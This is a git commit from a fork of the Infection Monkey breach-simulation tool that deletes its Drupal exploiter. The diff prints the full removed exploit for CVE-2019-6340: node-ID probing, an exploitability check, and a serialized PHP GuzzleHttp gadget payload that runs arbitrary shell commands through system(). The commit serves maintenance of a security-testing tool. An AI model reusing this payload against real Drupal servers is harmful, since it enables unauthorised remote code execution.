forked from p34709852/monkey
Agent: Remove DrupalExploiter and related code
This commit is contained in:
parent
7b3b17251a
commit
6052ca8fcc
|
@ -1,13 +1,4 @@
|
|||
import re
|
||||
from typing import Optional, Tuple
|
||||
from urllib.parse import urlparse
|
||||
|
||||
|
||||
def remove_port(url):
    """Strip a trailing numeric port from *url*, returning "<scheme>://<host>" (path dropped)."""
    components = urlparse(url)
    base = f"{components.scheme}://{components.netloc}"
    # The lookahead restricts the match to a :<digits> suffix, so host names
    # that merely contain digits (e.g. 8.8.8.8) are left intact.
    return re.sub(":[0-9]+(?=$|/)", "", base)
|
||||
|
||||
|
||||
def address_to_ip_port(address: str) -> Tuple[str, Optional[str]]:
|
||||
|
|
|
@ -1,197 +0,0 @@
|
|||
"""
|
||||
Remote Code Execution on Drupal server - CVE-2019-6340
|
||||
Implementation is based on:
|
||||
https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88
|
||||
/f9f6a5bb6605745e292bee3a4079f261d891738a.
|
||||
"""
|
||||
|
||||
import logging
|
||||
from urllib.parse import urljoin
|
||||
|
||||
import requests
|
||||
|
||||
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
|
||||
from common.network.network_utils import remove_port
|
||||
from infection_monkey.exploit.web_rce import WebRCE
|
||||
from infection_monkey.model import ID_STRING
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class DrupalExploiter(WebRCE):
    """
    Exploiter for Drupal's REST RCE (CVE-2019-6340), built on the generic WebRCE flow.

    Drupal-specific behavior handled here:
    - exploitable URLs must point at an article node (".../node/<id>");
    - once Drupal serves a cached response for a node, that node is no longer
      exploitable, so each vulnerable URL is single-use and several are needed
      for a full attack (see are_vulnerable_urls_sufficient).
    """

    _EXPLOITED_SERVICE = "Drupal Server"  # service name shown in reports/telemetry

    def __init__(self, host):
        super(DrupalExploiter, self).__init__(host)

    def get_exploit_config(self):
        """
        We override this function because the exploits requires a special extension in the URL,
        "node",
        e.g. an exploited URL would be http://172.1.2.3:<port>/node/3.
        :return: the Drupal exploit config
        """
        exploit_config = super(DrupalExploiter, self).get_exploit_config()
        exploit_config["url_extensions"] = [
            "node/",  # In Linux, no path is added
            "drupal/node/",
        ]  # However, Bitnami installations are under /drupal
        exploit_config["dropper"] = True  # deploy the agent via the dropper
        return exploit_config

    def add_vulnerable_urls(self, potential_urls, stop_checking=False):
        """
        We need a specific implementation of this function in order to add the URLs *with the
        node IDs*.
        We therefore check, for every potential URL, all possible node IDs.
        :param potential_urls: Potentially-vulnerable URLs
        :param stop_checking: Stop if one vulnerable URL is found
        :return: None (in-place addition)
        """
        for url in potential_urls:
            try:
                node_ids = find_exploitbale_article_ids(url)
                if node_ids is None:
                    logger.info("Could not find a Drupal node to attack")
                    continue
                for node_id in node_ids:
                    node_url = urljoin(url, str(node_id))
                    if self.check_if_exploitable(node_url):
                        self.add_vuln_url(
                            url
                        )  # This is for report. Should be refactored in the future
                        self.vulnerable_urls.append(node_url)
                        if stop_checking:
                            break
            except Exception as e:  # We still don't know which errors to expect
                logger.error(f"url {url} failed in exploitability check: {e}")
        if not self.vulnerable_urls:
            logger.info("No vulnerable urls found")

    def check_if_exploitable(self, url):
        """
        Check if a certain URL is exploitable.
        We use this specific implementation (and not simply run self.exploit) because this
        function does not "waste"
        a vulnerable URL. Namely, we're not actually exploiting, merely checking using a heuristic.
        :param url: Drupal's URL and port
        :return: True if the node looks exploitable, otherwise False
        """
        payload = build_exploitability_check_payload(url)

        response = requests.get(  # noqa: DUO123
            f"{url}?_format=hal_json",
            json=payload,
            headers={"Content-Type": "application/hal+json"},
            verify=False,  # targets commonly use self-signed certificates
            timeout=MEDIUM_REQUEST_TIMEOUT,
        )

        # A cached response never reaches the vulnerable deserialization path.
        if is_response_cached(response):
            logger.info(f"Checking if node {url} is vuln returned cache HIT, ignoring")
            return False

        # A vulnerable server attempts to resolve the bogus type link and leaks this error.
        return "INVALID_VALUE does not correspond to an entity on this site" in response.text

    def exploit(self, url, command):
        """
        Run *command* on the target via the deserialization gadget.
        :param url: vulnerable node URL (including port)
        :param command: shell command to execute
        :return: the command's output (text following the ID_STRING marker)
        """
        # Prefix output with ID_STRING so the command's result can be located in the response.
        cmd = f"echo {ID_STRING} && {command}"
        base = remove_port(url)
        payload = build_cmd_execution_payload(base, cmd)

        r = requests.get(  # noqa: DUO123
            f"{url}?_format=hal_json",
            json=payload,
            headers={"Content-Type": "application/hal+json"},
            verify=False,
            timeout=LONG_REQUEST_TIMEOUT,
        )

        if is_response_cached(r):
            logger.info(f"Exploiting {url} returned cache HIT, may have failed")

        if ID_STRING not in r.text:
            logger.warning("Command execution _may_ have failed")

        result = r.text.split(ID_STRING)[-1]
        return result

    def get_target_url(self):
        """
        We're overriding this method such that every time self.exploit is invoked, we use a fresh
        vulnerable URL.
        Reusing the same URL eliminates its exploitability because of caching reasons :)
        :return: vulnerable URL to exploit
        """
        return self.vulnerable_urls.pop()

    def are_vulnerable_urls_sufficient(self):
        """
        For the Drupal exploit, 5 distinct URLs are needed to perform the full attack.
        :return: Whether the list of vulnerable URLs has at least 5 elements.
        """
        # We need 5 URLs for a "full-chain": check remote files, check architecture, drop monkey,
        # chmod it and run it.
        num_urls_needed_for_full_exploit = 5
        num_available_urls = len(self.vulnerable_urls)
        result = num_available_urls >= num_urls_needed_for_full_exploit
        if not result:
            logger.info(
                f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a "
                f"Drupal server "
                f"but only {num_available_urls} found"
            )
        return result
|
||||
|
||||
|
||||
def is_response_cached(r: requests.Response) -> bool:
    """Return True when Drupal's cache header marks the response as a cache HIT."""
    cache_header = r.headers.get("X-Drupal-Cache")
    return cache_header == "HIT"
|
||||
|
||||
|
||||
def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100) -> set:
    """Probe node IDs in [lower, upper) and return those that answer 200 and are not cached."""
    exploitable = set()
    for node_id in range(lower, upper):
        node_url = urljoin(base_url, str(node_id))
        response = requests.get(  # noqa: DUO123
            node_url, verify=False, timeout=LONG_REQUEST_TIMEOUT
        )
        if response.status_code != 200:
            continue
        if is_response_cached(response):
            logger.info(f"Found a cached article at: {node_url}, skipping")
        else:
            exploitable.add(node_id)
    return exploitable
|
||||
|
||||
|
||||
def build_exploitability_check_payload(url):
    """
    Build a hal+json node-creation body whose type link points at the bogus
    "INVALID_VALUE" entity; a vulnerable server leaks a telltale error for it.
    :param url: target node URL
    :return: dict ready to be sent as the request's JSON body
    """
    type_href = urljoin(url, "/rest/type/node/INVALID_VALUE")
    return {
        "_links": {"type": {"href": type_href}},
        "type": {"target_id": "article"},
        "title": {"value": "My Article"},
        "body": {"value": ""},
    }
|
||||
|
||||
|
||||
def build_cmd_execution_payload(base, cmd):
    """
    Build the hal+json payload that executes *cmd* on a vulnerable Drupal server.

    The "options" value is a PHP-serialized GuzzleHttp FnStream/HandlerStack
    gadget chain that ends up calling system(<cmd>) when deserialized;
    |size| and |command| are placeholders substituted below.
    :param base: target base URL, port already stripped (see remove_port)
    :param cmd: shell command to embed in the gadget
    :return: dict ready to be sent as the request's JSON body
    """
    payload = {
        "link": [
            {
                "value": "link",
                # Adjacent string literals are concatenated into one serialized blob.
                "options": 'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
                'GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{s:5:"'
                'close";a:2:{i:0;O:23:"GuzzleHttp\\HandlerStack":3:'
                '{s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";'
                's:|size|:"|command|";s:30:"\u0000GuzzleHttp\\HandlerStack\u0000'
                'stack";a:1:{i:0;a:1:{i:0;s:6:"system";}}s:31:"\u0000'
                'GuzzleHttp\\HandlerStack\u0000cached";b:0;}i:1;s:7:"'
                'resolve";}}s:9:"_fn_close";a:2:{i:0;r:4;i:1;s:7:"resolve";}}'
                # NOTE(review): |size| uses len(cmd) (character count); PHP expects a
                # byte length, so this assumes an ASCII-only command — verify if
                # commands can contain multi-byte characters.
                "".replace("|size|", str(len(cmd))).replace("|command|", cmd),
            }
        ],
        "_links": {"type": {"href": f"{urljoin(base, '/rest/type/shortcut/default')}"}},
    }
    return payload
|
|
@ -85,9 +85,6 @@ class WebRCE(HostExploiter):
|
|||
)
|
||||
self.add_vulnerable_urls(potential_urls, exploit_config["stop_checking_urls"])
|
||||
|
||||
if not self.are_vulnerable_urls_sufficient():
|
||||
return False
|
||||
|
||||
# Upload the right monkey to target
|
||||
data = self.upload_monkey(self.get_target_url(), exploit_config["upload_commands"])
|
||||
|
||||
|
@ -424,18 +421,7 @@ class WebRCE(HostExploiter):
|
|||
"""
|
||||
This method allows "configuring" the way in which a vulnerable URL is picked.
|
||||
If the same URL should be used - always return the first.
|
||||
Otherwise - implement your own (e.g. Drupal must use a new URI each time).
|
||||
Otherwise - implement your own.
|
||||
:return: a vulnerable URL
|
||||
"""
|
||||
return self.vulnerable_urls[0]
|
||||
|
||||
def are_vulnerable_urls_sufficient(self):
|
||||
"""
|
||||
Determine whether the number of vulnerable URLs is sufficient in order to perform the
|
||||
full attack.
|
||||
Often, a single URL will suffice. However, in some cases (e.g. the Drupal exploit) a
|
||||
vulnerable URL is for
|
||||
single use, thus we need a couple of them.
|
||||
:return: Whether or not a full attack can be performed using the available vulnerable URLs.
|
||||
"""
|
||||
return len(self.vulnerable_urls) > 0
|
||||
|
|
|
@ -1,13 +1,4 @@
|
|||
from unittest import TestCase
|
||||
|
||||
from common.network.network_utils import address_to_ip_port, remove_port
|
||||
|
||||
|
||||
class TestNetworkUtils(TestCase):
    def test_remove_port_from_url(self):
        # Each case maps an input URL to its expected scheme://host form.
        cases = (
            ("https://google.com:80", "https://google.com"),
            ("https://8.8.8.8:65336", "https://8.8.8.8"),
            ("ftp://ftpserver.com:21/hello/world", "ftp://ftpserver.com"),
        )
        for url, expected in cases:
            assert remove_port(url) == expected
|
||||
from common.network.network_utils import address_to_ip_port
|
||||
|
||||
|
||||
def test_address_to_ip_port():
|
||||
|
|
Loading…
Reference in New Issue